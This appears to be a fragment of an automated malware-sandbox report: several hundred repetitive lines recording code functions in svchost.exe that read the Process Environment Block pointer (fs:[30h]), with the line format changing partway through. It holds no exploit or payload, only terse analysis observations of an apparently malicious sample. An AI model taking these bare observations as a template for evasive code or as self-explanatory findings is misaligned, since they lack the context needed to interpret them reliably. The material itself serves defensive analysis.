Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] (x8)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h] (x3)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h] (x12)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h] (x2)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h] (x4)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]2_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]2_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]2_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]2_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]2_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]2_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]2_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]2_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]2_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]2_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]2_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]2_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]2_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]2_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]2_2_0386A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]2_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]2_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]2_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]2_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]2_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]2_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]2_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]2_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]2_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]2_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]2_2_03828B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]2_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]2_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
